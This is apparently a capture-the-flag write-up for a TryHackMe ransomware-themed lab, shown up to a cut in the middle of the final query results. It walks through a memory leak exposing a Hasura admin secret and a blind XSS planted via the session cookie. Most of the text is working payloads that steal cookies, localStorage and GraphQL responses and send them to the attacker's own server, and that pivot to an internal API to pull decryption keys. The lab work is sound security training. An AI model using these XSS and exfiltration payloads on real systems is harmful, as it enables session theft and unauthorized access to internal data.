Carpe Diem 1 - (salty) Write-up - TryHackMe

Information

Room#

  • Name: Carpe Diem 1
  • Profile: tryhackme.com
  • Difficulty: Hard
  • Description: Recover your client's encrypted files before the ransomware timer runs out!


Write-up

Overview#

Install the tools used in this WU on BlackArch Linux:

$ sudo pacman -S nmap ctf-party haiti john keepassxc

Network enumeration#

Port and service scan:

# Nmap 7.93 scan initiated Mon Feb 13 22:42:21 2023 as: nmap -sSVC -T4 -p- -v --open --reason -oA nmap 10.10.121.247
Nmap scan report for 10.10.121.247
Host is up, received echo-reply ttl 63 (0.032s latency).
Not shown: 65377 closed tcp ports (reset), 155 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 nginx 1.6.2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home
|_http-server-header: nginx/1.6.2
111/tcp open rpcbind syn-ack ttl 63 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33386/tcp6 status
| 100024 1 37481/tcp status
| 100024 1 42270/udp status
|_ 100024 1 56131/udp6 status
37481/tcp open status syn-ack ttl 63 1 (RPC #100024)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 13 22:42:47 2023 -- 1 IP address (1 host up) scanned in 26.05 seconds

Web discovery#

Let's download the file mentioned in the description.

$ wget http://10.10.121.247/downloads/Database.carp

The file must be one encrypted by the ransomware.

The homepage is a classic ransomware page: there is a timer and a BTC address (bc1q989cy4zp8x9xpxgwpznsxx44u0cxhyjjyp78hj).

In the source of the HTML page we can see this chunk of JavaScript code:

function aaa(wallet) {
    var wallet = wallet;
    if (wallet.trim() === 'bc1q989cy4zp8x9xpxgwpznsxx44u0cxhyjjyp78hj'){
        alert('Hey! \n\nstupid is as stupid does...');
        return;
    }

    var re = new RegExp("^([a-z0-9]{42,42})$");
    if (re.test(wallet.trim())) {
        var http = new XMLHttpRequest();
        var url = 'http://c4rp3d13m.net/proof/';
        http.open('POST', url, true);
        http.setRequestHeader('Content-type', 'application/json');
        var d = '{"size":42,"proof":"'+wallet+'"}';
        http.onreadystatechange = function() {
            if(http.readyState == 4 && http.status == 200) {
                //alert(http.responseText);
            }
        }
        http.send(d);
    } else {
        alert('Invalid wallet!');
    }
}

Let's add the domain name to /etc/hosts.

$ grep c4rp3d13m /etc/hosts
10.10.121.247 c4rp3d13m.net

Looking at the HTTP headers, the application server is Express (Node.js); there is a countdown cookie, and the session cookie contains our IP address encoded in base64.

$ curl -I http://c4rp3d13m.net/
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 13 Feb 2023 22:02:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 3927
Connection: keep-alive
X-Powered-By: Express
Set-Cookie: session=MTAuMTguMjUuMTk5; Max-Age=900; Path=/; Expires=Mon, 13 Feb 2023 22:17:26 GMT; HttpOnly
Set-Cookie: countdown=2023-02-13T21%3A42%3A42.027897; Max-Age=900; Path=/; Expires=Mon, 13 Feb 2023 22:17:26 GMT
ETag: W/"f57-pPQq+82IGyFfhUOUJGjEW+Mr+1E"
Last-Modified: Monday, 13-Feb-2023 22:02:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0

$ ctf-party MTAuMTguMjUuMTk5 from_b64
10.18.25.199

Data leak#

Let's get back to the proof endpoint: it's expecting a 42-character wallet address.

$ ruby -e 'puts "a"*42'
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

The request looks like this:

POST /proof/ HTTP/1.1
Host: c4rp3d13m.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/json
Content-Length: 64
Origin: http://c4rp3d13m.net
Connection: close
Referer: http://c4rp3d13m.net/
Cookie: session=MTAuMTguMjUuMTk5; countdown=undefined

{"size":42,"proof":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}

The response just reflects the address.

If you put in a wrong value, let's say only one char…

{"size":42,"proof":"a"}

… then some content is leaked…

atokens;
}

module.exports = split;
7mo

…the address we provided plus 41 other bytes.

Since we control the size parameter, we may increase it.
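
For example, we can replay the request with a bigger size (a sketch; the value 2000 is arbitrary and the session cookie is the one we received earlier):

$ curl -s http://c4rp3d13m.net/proof/ \
    -H 'Content-Type: application/json' \
    -b 'session=MTAuMTguMjUuMTk5' \
    -d '{"size":2000,"proof":"a"}'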

Using any long size we can leak some garbage followed by this interesting content:

request.post({ headers: {'content-type' : 'application/json','x-hasura-admin-secret' : 's3cr3754uc35432' error connecting to http://192.168.150.10/v1/graphql/

Looks like some credentials for an internal GraphQL endpoint we can't access for now.

Searching for x-hasura-admin-secret we find https://hasura.io/blog/hasura-authentication-explained/ so the GraphQL engine is Hasura.

Blind XSS and salt#

Let's get back to the base64 encoded session cookie. Since it contains an IP address we can assume there will be some kind of SSRF.

I injected some payloads without success. At this point, I won't lie, I consulted the write-up.

So you had to guess that there is a blind XSS on an internal backend and that double quotes are filtered.

Note: I noticed none of the third-party write-ups explained why they tried a blind XSS payload there or how they figured it out, so I assume they were probably blocked like me and read the author's write-up.

Rather than injecting a full script, it is more flexible to inject an entrypoint loading an external resource that we can then modify at will without changing the initial payload.

<script src='http://10.18.25.199:9999/noraj.js'></script>

Just base64-encode it with ctf-party and replace the session cookie value.

$ ctf-party "<script src='http://10.18.25.199:9999/noraj.js'></script>" to_b64
PHNjcmlwdCBzcmM9J2h0dHA6Ly8xMC4xOC4yNS4xOTk6OTk5OS9ub3Jhai5qcyc+PC9zY3JpcHQ+
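
Then deliver the payload by sending the encoded value as our session cookie (a sketch; any request the internal backend later renders should do):

$ curl http://c4rp3d13m.net/ \
    -b 'session=PHNjcmlwdCBzcmM9J2h0dHA6Ly8xMC4xOC4yNS4xOTk6OTk5OS9ub3Jhai5qcyc+PC9zY3JpcHQ+'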

Then start an HTTP server to serve noraj.js.

$ ruby -run -ehttpd public -p9999
[2023-02-22 23:40:14] INFO WEBrick 1.8.1
[2023-02-22 23:40:14] INFO ruby 3.0.5 (2022-11-24) [x86_64-linux]
[2023-02-22 23:40:14] INFO WEBrick::HTTPServer#start: pid=6760 port=9999
10.10.75.56 - - [22/Feb/2023:23:42:40 CET] "GET /noraj.js HTTP/1.1" 200 0
http://192.168.150.13:5000/ -> /noraj.js

Then we need a data grabber to extract valuable information.

Note: reading other write-ups, I have seen everyone using some XHR. But why would you use the horrible syntax of XMLHttpRequest()? It's so old it was already supported in Chrome and Firefox version 1, yes, version 1. Fortunately, anyone with a bit of client-side web knowledge knows that nowadays you can use the nicer fetch() method instead. Do you still use Internet Explorer? No? So please stop using XHR too. It's like continuing to use mono-threaded dirb in 2023 while ffuf exists…

So to (try to) steal cookies, I used this payload in noraj.js:

fetch('http://10.18.25.199:9999/data', {
    method: 'POST',
    mode: 'no-cors',
    body: document.cookie
});

But fetch wouldn't work here 😡 So I had to use an XHR payload to understand why. 😡 I had my idea, but I won't judge before seeing it. So here is a payload to grab the user agent.

x = new XMLHttpRequest();
x.open("GET", "http://10.18.25.199:9999/data?ua="+window.navigator.userAgent);
x.send();
$ ctf-party 'Mozilla/5.0%20(Unknown;%20Linux%20x86_64)%20AppleWebKit/538.1%20(KHTML,%20like%20Gecko)%20PhantomJS/2.1.1%20Safari/538.1' urldecode
Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1

According to Can I Use, only IE lacks fetch support, but the target is surely not a Windows server. The other explanation is that the browser-driving framework used for the challenge has quite poor support for real browser features. Now that we have fetched the User-Agent, we know the challenge app is using PhantomJS 2.1 (see https://user-agents.net/s/L2AB). But PhantomJS is terrible, deprecated and abandoned. fetch() is not part of ECMAScript (JavaScript) but of the Web platform API (defined by WHATWG and W3C), like most of the BOM (Browser Object Model), and PhantomJS does not even support Promise. Yet another example of poor challenge implementation which makes it very far from real life. The author should have used a more robust headless-browser control library like Selenium or Puppeteer. And there is no excuse: PhantomJS was already abandoned and lacking modern features in 2020 when the room was released.
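
Before blaming the browser, a tiny probe exfiltrated over the same channel can confirm which APIs are missing (a sketch; the query-string parameter names are arbitrary):

// report the type of fetch and Promise as seen by the victim browser
var probe = new XMLHttpRequest();
probe.open("GET", "http://10.18.25.199:9999/data?fetch=" + (typeof window.fetch) + "&promise=" + (typeof window.Promise));
probe.send();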

So in real life you would use fetch(), but on this CTF-y challenge you are forced to use old XHR. 😡 If you can't learn new things, let's rediscover the past then.

This is the part where you are supposed to craft huge XHR requests, trying to enumerate everything, base64-encoding everything, and doing it the hard way, because the player is supposed to be a mid-level web hacker and doing it the hard way makes you learn stuff. But what if I have already done that shit tons of times and I am bored of it? What if I'm a web expert? I'll just use a BeEF hook, because in real life cybercriminals would use a BeEF-like C2 framework to exploit a blind XSS on a large victim range, to be able to scale and automate. An auditor would do the same, but to save time. So no, I refuse to do it the stupid way the author intends.

$ ctf-party "<script src='http://10.18.25.199:3000/hook.js'></script>" to_b64
PHNjcmlwdCBzcmM9J2h0dHA6Ly8xMC4xOC4yNS4xOTk6MzAwMC9ob29rLmpzJz48L3NjcmlwdD4=

However, we still have the same issue: the deprecated PhantomJS doesn't seem to support the BeEF hook.

So let's get back to XHR…

Let's make a small web server data grabber:

require 'agoo'

# https://rubydoc.info/gems/agoo/Agoo/Log#configure-class_method
Agoo::Log.configure(dir: '',
                    console: true,
                    classic: true,
                    colorize: true,
                    states: {
                      ERROR: false,
                      WARN: false,
                      INFO: false,
                      DEBUG: true,
                      connect: true,
                      request: true,
                      response: false,
                      eval: false,
                      push: false,
                    })

# https://rubydoc.info/gems/agoo/Agoo/Server#init-class_method
Agoo::Server.init(9999, 'public')

# Minimal handler: always answer 200 so the XHR succeeds;
# the request logging enabled above does the actual data grabbing.
class DataLogger
  def call(req)
    [ 200, { }, [ "noraj" ] ]
  end
end

handler = DataLogger.new
Agoo::Server.handle(:POST, "/data", handler)
Agoo::Server.handle(:OPTIONS, "/data", handler)
Agoo::Server.start()

With PhantomJS the POST doesn't work…

var x = new XMLHttpRequest();
x.open("POST", "http://10.18.25.199:9999/data");
x.setRequestHeader('Content-Type', 'application/json');
x.send(JSON.stringify(localStorage));

With PhantomJS the template-literal string interpolation syntax (ES6) doesn't work either…

var xhr=new XMLHttpRequest();
var data = JSON.stringify(localStorage);
xhr.open("GET", `http://10.18.25.199:9999/?q=${data}`);
xhr.send();

With PhantomJS string concatenation… works!

var xhr=new XMLHttpRequest();
var data = JSON.stringify(localStorage);
xhr.open("GET", "http://10.18.25.199:9999/?q=" + data);
xhr.send();

We can decode the received request URL with ctf-party:

$ ctf-party '/?q=%7B%22secret%22:%22s3cr3754uc35432%22,%22flag1%22:%22THM%EDITED%7D%22%7D' urldecode
/?q={"secret":"s3cr3754uc35432","flag1":"THM{EDITED}"}

Blind XSS, GraphQL and more salt#

From the data leak we had earlier, we know about an internal Hasura GraphQL endpoint and the associated admin secret.

So first I retrieved GraphQL Voyager's introspection query, and then I minified it with a CodePen snippet.

Resulting in:

query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
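
The minification itself is trivial; a rough approximation of such a snippet just collapses whitespace runs, since GraphQL treats any whitespace as a token separator (a sketch; introspectionQuery is a hypothetical variable holding the raw query, and a proper minifier would also drop spaces around punctuation):

// collapse every whitespace run into a single space
var minified = introspectionQuery.replace(/\s+/g, ' ').trim();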

Then we can send the introspection query as an admin, retrieve the result, base64 it and exfiltrate it to our server:

var xhr=new XMLHttpRequest();
var data = '{"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}';
xhr.open("POST", "http://192.168.150.10:8080/v1/graphql/", true);
xhr.setRequestHeader('x-hasura-admin-secret', 's3cr3754uc35432');
xhr.onreadystatechange = function() {
    if (xhr.readyState === 4 && xhr.status === 200) {
        var exfil = new XMLHttpRequest();
        exfil.open('GET','http://10.18.25.199:9999/data?q='+btoa(xhr.responseText),false);
        exfil.send();
    }
};
xhr.send(data);

The Hasura endpoint seems not to support the introspection query from GraphQL Voyager (or the minification goes wrong), but testing something minimal like {__schema{types{name}}} works.

Pseudo-minifying manually by just removing newlines didn't work either, and neither did replacing newlines with \n. So let's try another introspection query, from PATT (PayloadsAllTheThings). Whatever I did, it seemed not to work.

For some obscure reason, not even explained in the author's write-up, the cookie can't contain double quotes. But SOMETIMES that seems to be the case for the script content as well. Many previous XHR payloads contained double quotes and worked, yet it seems nobody managed to pass the GraphQL part without base64-encoding the JS payload. Nobody seems to know what they are doing, everyone just recopies the author's payload, so since it's unrealistic and obscure let's just do that as well; at this point I just want to end that shit.

Valid GraphQL queries are not coming back to us because the GET request gets too big.

# agoo
D 2023/02/25 22:19:59.104263175 DEBUG: HTTP response on 369: HTTP/1.1 431 Request Header Fields Too Large
# webrick
[2023-02-25 22:27:08] ERROR WEBrick::HTTPStatus::RequestURITooLarge

That's why I wanted to use POST in the first place, but due to CORS it works only on the same host (a cross-origin POST with a JSON body triggers a preflight), so we are forced to use GET for exfiltration.

I assume we could split the answer into many parts and send dozens of GET requests to retrieve a full introspection, but that would be an unnecessary pain for a poorly written challenge.
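
For the record, here is a minimal sketch of that chunked exfiltration, assuming it runs inside the onreadystatechange handler where xhr.responseText is available:

// split the base64-encoded response into pieces small enough for a GET URL
var b64 = btoa(xhr.responseText);
var chunk = 1000; // stay well below typical header size limits
for (var i = 0; i < b64.length; i += chunk) {
    var part = new XMLHttpRequest();
    part.open('GET', 'http://10.18.25.199:9999/data?i=' + i + '&q=' + encodeURIComponent(b64.substring(i, i + chunk)), false);
    part.send();
}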

This payload works and doesn't need encoding despite the double quotes.

var xhr = new XMLHttpRequest();
var data = '{"query":"{__schema{types{name}}}"}';
xhr.open("POST", "http://192.168.150.10:8080/v1/graphql/", true);
xhr.setRequestHeader('x-hasura-admin-secret', 's3cr3754uc35432');
xhr.onreadystatechange = function() {
    if (xhr.readyState === 4 /*&& xhr.status === 200*/) {
        var exfil = new XMLHttpRequest();
        exfil.open('GET','http://10.18.25.199:9999/data?grapql=' + btoa(xhr.responseText) + '&httpcode=' + xhr.status, false);
        exfil.send();
    }
};
xhr.send(data);
10.10.113.20 - - [25/Feb/2023 22:49:37] "GET /data?grapql=eyJkYXRhIjp7Il9fc2NoZW1hIjp7InR5cGVzIjpbeyJuYW1lIjoiQm9vbGVhbiJ9LHsibmFtZSI6IkZsb2F0In0seyJuYW1lIjoiSUQifSx7Im5hbWUiOiJJbnQifSx7Im5hbWUiOiJJbnRfY29tcGFyaXNvbl9leHAifSx7Im5hbWUiOiJTdHJpbmcifSx7Im5hbWUiOiJTdHJpbmdfY29tcGFyaXNvbl9leHAifSx7Im5hbWUiOiJfX0RpcmVjdGl2ZSJ9LHsibmFtZSI6Il9fRGlyZWN0aXZlTG9jYXRpb24ifSx7Im5hbWUiOiJfX0VudW1WYWx1ZSJ9LHsibmFtZSI6Il9fRmllbGQifSx7Im5hbWUiOiJfX0lucHV0VmFsdWUifSx7Im5hbWUiOiJfX1NjaGVtYSJ9LHsibmFtZSI6Il9fVHlwZSJ9LHsibmFtZSI6Il9fVHlwZUtpbmQifSx7Im5hbWUiOiJjb25mbGljdF9hY3Rpb24ifSx7Im5hbWUiOiJtdXRhdGlvbl9yb290In0seyJuYW1lIjoib3JkZXJfYnkifSx7Im5hbWUiOiJxdWVyeV9yb290In0seyJuYW1lIjoic3Vic2NyaXB0aW9uX3Jvb3QifSx7Im5hbWUiOiJ0aW1lc3RhbXAifSx7Im5hbWUiOiJ0aW1lc3RhbXBfY29tcGFyaXNvbl9leHAifSx7Im5hbWUiOiJ2aWN0aW1zIn0seyJuYW1lIjoidmljdGltc19hZ2dyZWdhdGUifSx7Im5hbWUiOiJ2aWN0aW1zX2FnZ3JlZ2F0ZV9maWVsZHMifSx7Im5hbWUiOiJ2aWN0aW1zX2FnZ3JlZ2F0ZV9vcmRlcl9ieSJ9LHsibmFtZSI6InZpY3RpbXNfYXJyX3JlbF9pbnNlcnRfaW5wdXQifSx7Im5hbWUiOiJ2aWN0aW1zX2F2Z19maWVsZHMifSx7Im5hbWUiOiJ2aWN0aW1zX2F2Z19vcmRlcl9ieSJ9LHsibmFtZSI6InZpY3RpbXNfYm9vbF9leHAifSx7Im5hbWUiOiJ2aWN0aW1zX2NvbnN0cmFpbnQifSx7Im5hbWUiOiJ2aWN0aW1zX2luY19pbnB1dCJ9LHsibmFtZSI6InZpY3RpbXNfaW5zZXJ0X2lucHV0In0seyJuYW1lIjoidmljdGltc19tYXhfZmllbGRzIn0seyJuYW1lIjoidmljdGltc19tYXhfb3JkZXJfYnkifSx7Im5hbWUiOiJ2aWN0aW1zX21pbl9maWVsZHMifSx7Im5hbWUiOiJ2aWN0aW1zX21pbl9vcmRlcl9ieSJ9LHsibmFtZSI6InZpY3RpbXNfbXV0YXRpb25fcmVzcG9uc2UifSx7Im5hbWUiOiJ2aWN0aW1zX29ial9yZWxfaW5zZXJ0X2lucHV0In0seyJuYW1lIjoidmljdGltc19vbl9jb25mbGljdCJ9LHsibmFtZSI6InZpY3RpbXNfb3JkZXJfYnkifSx7Im5hbWUiOiJ2aWN0aW1zX3NlbGVjdF9jb2x1bW4ifSx7Im5hbWUiOiJ2aWN0aW1zX3NldF9pbnB1dCJ9LHsibmFtZSI6InZpY3RpbXNfc3RkZGV2X2ZpZWxkcyJ9LHsibmFtZSI6InZpY3RpbXNfc3RkZGV2X29yZGVyX2J5In0seyJuYW1lIjoidmljdGltc19zdGRkZXZfcG9wX2ZpZWxkcyJ9LHsibmFtZSI6InZpY3RpbXNfc3RkZGV2X3BvcF9vcmRlcl9ieSJ9LHsibmFtZSI6InZpY3RpbXNfc3RkZGV2X3NhbXBfZmllbGRzIn0seyJuYW1lIjoidmljdGltc19zdGRkZXZfc2FtcF9vcmRlcl9ieSJ9LHsibmFtZSI6InZpY3RpbXNfc3VtX2ZpZWxkcyJ9LHsibmFtZSI6InZpY3RpbXNfc3VtX29yZGVyX2J5In0seyJuYW1lIjoidmljdGltc191cGRhdGVfY29sdW1uIn0seyJuYW1lIjoidmljdGltc192YXJfcG9wX2ZpZWxkcyJ9LHsibmFtZSI6InZpY3RpbXNfdmFyX3BvcF9vcmRlcl9ieSJ9LHsibmFtZSI6InZpY3RpbXNfdmFyX3NhbXBfZmllbGRzIn0seyJuYW1lIjoidmljdGltc192YXJfc2FtcF9vcmRlcl9ieSJ9LHsibmFtZSI6InZpY3RpbXNfdmFyaWFuY2VfZmllbGRzIn0seyJuYW1lIjoidmljdGltc192YXJpYW5jZV9vcmRlcl9ieSJ9XX19fQ==&httpcode=200 HTTP/1.1" 404 -

Decoded data:

{"data":{"__schema":{"types":[{"name":"Boolean"},{"name":"Float"},{"name":"ID"},{"name":"Int"},{"name":"Int_comparison_exp"},{"name":"String"},{"name":"String_comparison_exp"},{"name":"__Directive"},{"name":"__DirectiveLocation"},{"name":"__EnumValue"},{"name":"__Field"},{"name":"__InputValue"},{"name":"__Schema"},{"name":"__Type"},{"name":"__TypeKind"},{"name":"conflict_action"},{"name":"mutation_root"},{"name":"order_by"},{"name":"query_root"},{"name":"subscription_root"},{"name":"timestamp"},{"name":"timestamp_comparison_exp"},{"name":"victims"},{"name":"victims_aggregate"},{"name":"victims_aggregate_fields"},{"name":"victims_aggregate_order_by"},{"name":"victims_arr_rel_insert_input"},{"name":"victims_avg_fields"},{"name":"victims_avg_order_by"},{"name":"victims_bool_exp"},{"name":"victims_constraint"},{"name":"victims_inc_input"},{"name":"victims_insert_input"},{"name":"victims_max_fields"},{"name":"victims_max_order_by"},{"name":"victims_min_fields"},{"name":"victims_min_order_by"},{"name":"victims_mutation_response"},{"name":"victims_obj_rel_insert_input"},{"name":"victims_on_conflict"},{"name":"victims_order_by"},{"name":"victims_select_column"},{"name":"victims_set_input"},{"name":"victims_stddev_fields"},{"name":"victims_stddev_order_by"},{"name":"victims_stddev_pop_fields"},{"name":"victims_stddev_pop_order_by"},{"name":"victims_stddev_samp_fields"},{"name":"victims_stddev_samp_order_by"},{"name":"victims_sum_fields"},{"name":"victims_sum_order_by"},{"name":"victims_update_column"},{"name":"victims_var_pop_fields"},{"name":"victims_var_pop_order_by"},{"name":"victims_var_samp_fields"},{"name":"victims_var_samp_order_by"},{"name":"victims_variance_fields"},{"name":"victims_variance_order_by"}]}}}

Then you are supposed to use the PATT introspection query, but whatever web server I used, the result was always too long, except with python -m http.server 9999 --directory public. I recopied the introspection query from the author's payload because when I tried to format it myself it didn't work.

var xhr = new XMLHttpRequest();
var data = '{"query":"fragment FullType on __Type {\n kind\n name\n description\n fields(includeDeprecated: true) {\n name\n description\n args{\n ...InputValue\n }\n type {\n ...TypeRef\n }\nisDeprecated\n deprecationReason\n }\n inputFields {\n ...InputValue\n }\ninterfaces {\n ...TypeRef\n }\n enumValues(includeDeprecated: true) {\nname\n description\n isDeprecated\n deprecationReason\n }\n possibleTypes{\n ...TypeRef\n }\n}\nfragment InputValue on __InputValue {\n name\ndescription\n type {\n ...TypeRef\n }\n defaultValue\n}\nfragment TypeRef on__Type {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\nname\n ofType {\n kind\n name\n ofType {\n kind\nname\n ofType {\n kind\n name\n ofType {\nkind\n name\n ofType {\n kind\nname\n }\n }\n }\n }\n }\n }\n }\n}\n\nquery IntrospectionQuery {\n __schema {\n queryType {\n name\n }\nmutationType {\n name\n }\n types {\n ...FullType\n }\ndirectives {\n name\n description\n locations\n args{\n ...InputValue\n }\n }\n }\n}\n","variables":null,"operationName":"IntrospectionQuery"}';
xhr.open("POST", "http://192.168.150.10:8080/v1/graphql/", true);
xhr.setRequestHeader('x-hasura-admin-secret', 's3cr3754uc35432');
xhr.onreadystatechange = function() {
    if (xhr.readyState === 4 /*&& xhr.status === 200*/) {
        var exfil = new XMLHttpRequest();
        exfil.open('GET','http://10.18.25.199:9999/data?grapql=' + btoa(xhr.responseText) + '&httpcode=' + xhr.status, false);
        exfil.send();
    }
};
xhr.send(data);

I won't paste the full JSON schema because it's way too long but here are some screenshots from GraphQL Voyager.

Queries:

Mutations:

Once you have the full schema, you can identify where the interesting data is stored (the victims node) and make the following query.

var xhr = new XMLHttpRequest();
var data = '{"query":"{victims {filename id key name timer}}"}';
xhr.open("POST", "http://192.168.150.10:8080/v1/graphql/", true);
xhr.setRequestHeader('x-hasura-admin-secret', 's3cr3754uc35432');
xhr.onreadystatechange = function() {
    if (xhr.readyState === 4 /*&& xhr.status === 200*/) {
        var exfil = new XMLHttpRequest();
        exfil.open('GET','http://10.18.25.199:9999/data?grapql=' + btoa(xhr.responseText) + '&httpcode=' + xhr.status, false);
        exfil.send();
    }
};
xhr.send(data);

Decoded results:

{"data":{"victims":[{"filename":"miredo.conf","id":69,"key":"RW1Ed3ZNV09aeWFjOTdxM1B0OFQzTkNFY0JDbDNKenA1a1FfVFBfWXZ6ZVN5MnAuTkpJV1NUanRsZ0lWQVZWUg==","name":"192.168.66.12","timer":"2020-04-15T20:56:13.203303"}, {"filename":"fuse.conf","id":71,"key":"OHphWi50Umt5SEVBNGhYemlxM3hzOFZCWTN3YzFjWFVVMkQ2Z3d0NEcxRFJ6cGJWbGZYY3FSMUpLREpEYXRrdw==","name":"192.168.66.200","timer":"2020-04-15T20:57:00.398945"}, {"filename":"Photos.zip","id":49,"key":"22iAgaC6Z8BT4+YhiCBWuOLXWuc+JKmKf6XZynuCfTKD7kXuz9/mHeDE8Vvlk4Dtu0kSMHxnQ3VaUD72GzG4UA==","name":"77.154.250.54","timer":"2020-03-19T11:29:48.523753"}, {"filename":"Transfers.csv","id":42,"key":"w68C7PrR4HkCLWYpbH5tUPh4Uh3og91QUtzWD2SmnJeNGIDZZ7Lbesp6Aa9cx36vqsICnfCYT0H6Ff6SmOaI6Q==","name":"192.168.66.134","timer":"2019-04-09T10:50:37.585655"}, {"filename":"BTC-Wallet.tar","id":50,"key":"1AcXybheh5579DlQmcQq4Awlv1Qs6uZXzM+ke3po6zgz6C294iT6YJgMz9n7myd2Vf6KxS+yuZziPcICLXe75g==","name":"45.35.25.4","timer":"2020-04-12T14:30:18.766926"}, {"filename":"archive.zip","id":43,"key":"MtwC53PsMaD0TkRyCr/vYhBxEHqXict7MUoYUSux9J036ifSgXtqPdVmAIdqm7EEcov6cjicqhOom2woKKkUdQ==","name":"26.34.132.1","timer":"2019-01-11T10:50:37.617187"}, {"filename":"Books.xls","id":45,"key":"pukeL2llboQLPKlG71yEGUFiV1bmXBv6fadrhIjyDRM6bZjrFYXtFP8uN13hDq6iEDoneH8W//XIHw4/L/nc6Q==","name":"192.168.150.1","timer":"2020-04-14T10:56:35.669927"}, {"filename":"Database.kbxd","id":48,"key":"EDITED","name":"195.204.178.84","timer":"2020-04-15T14:29:24.383136"}, {"filename":"protocols.txt","id":66,"key":"bk0udDFibXEzaDZ0QjZKSGNXNVlDZEJEbGJSZ0toRkdiSkxqSlpRdER4R25wUC5yUklZazJMUi5hLm1jLkp6dg==","name":"192.168.14.45","timer":"2020-04-15T20:52:45.553107"}, {"filename":"mailcap.order","id":67,"key":"VExYcHRGTmpBc0poREcwU3F5YmNyS0VLblQuNkpBT1laQWVLd2Vwbm13Wmx6cnpxSUNSdGM2Sld2RmZoRm9Zdg==","name":"192.168.16.87","timer":"2020-04-15T20:55:03.712607"}, {"filename":"debconf.conf","id":68,"key":"ZE5qVHhoN0Zadi5kR1hjOHNFNFNFYnF6Vl9DZG9wYmliYmQ4MW1rd1RfRURvdFhhZ3pUUlhHc2tNaklRRVZGMA==","name":"195.204.167.10","timer":"2020-04-15T20:55:50.152751"}, {"filename":"wgetrc","id":75,"key":"NUJFZ0VXcjBHSUhsbVhxMFZZLmpFWFRCdmxFMHp1NkNmcmRZeDdXdUs4UXBhY1RyUGJTVDRDQ2VlbDhlWWdzNA==","name":"192.168.16.65","timer":"2020-04-16T06:43:27.536027"}, {"filename":"smartd.conf","id":83,"key":"b1N2OE45cTRfR25uQjZJREp0bTZ6c0FIWDRvZHVvbi4wT2NqejJvN0hpNWdod0Rrb2tEMkpyVTNNclBLTm9ybQ==","name":"192.168.16.53","timer":"2020-04-16T12:44:38.639593"}, {"filename":"reportbug.conf","id":85,"key":"bFNBb1BBWGV6RTRfSWVnQVVBakhtODZya1c4MWdiQjFoUElsV0UySHdZZU13cEVIOVNlZElUalZnVE96M2wwYw==","name":"192.168.225.1","timer":"2020-04-17T14:49:13.031589"}, {"filename":"vegan_secrets.txt","id":74,"key":"SFFaU0pCTXdUcDJYWlZQR29oY2ZRbkwzWk5JeTRKZXQ4MWxBTnE2ekpDVV9PM3c2SDZGeHdHRHZUSEdaWTFiRQ==","name":"192.168.66.1","timer":"2020-04-15T20:58:08.833383"}, {"filename":"modules.doc","id":70,"key":"ZzJrSU12RmdNT1ZSQjAxYmx0dWNGeHFXNVF2RW9tMEt4Q29lT2hPbWhfaHJSRHBzMWJqUVlIYUFOQkNHUWRSZg==","name":"192.168.66.111","timer":"2020-04-15T20:56:33.911143"}, {"filename":"papersize.clip","id":72,"key":"R24xR1h4aGE2aEJRVEhWRHpUdHVDU1BCLi5VdUxQQm5JZ2ZHQ0U2b0tJZzhGclhZTG53eDE3U1Eya2VKajBjMA==","name":"192.168.66.188","timer":"2020-04-15T20:57:26.348101"}, {"filename":"small_steps.rtf","id":73,"key":"dzAwNk1mR0EwY0loa2FUaVkuckgyMUxObVRONFdzWktwcDk4dVZMc1M3ZzlmUGMzaXRISktwZ1RLYUpuZVdEdg==","name":"192.168.0.12","timer":"2020-04-15T20:57:41.321097"}, 
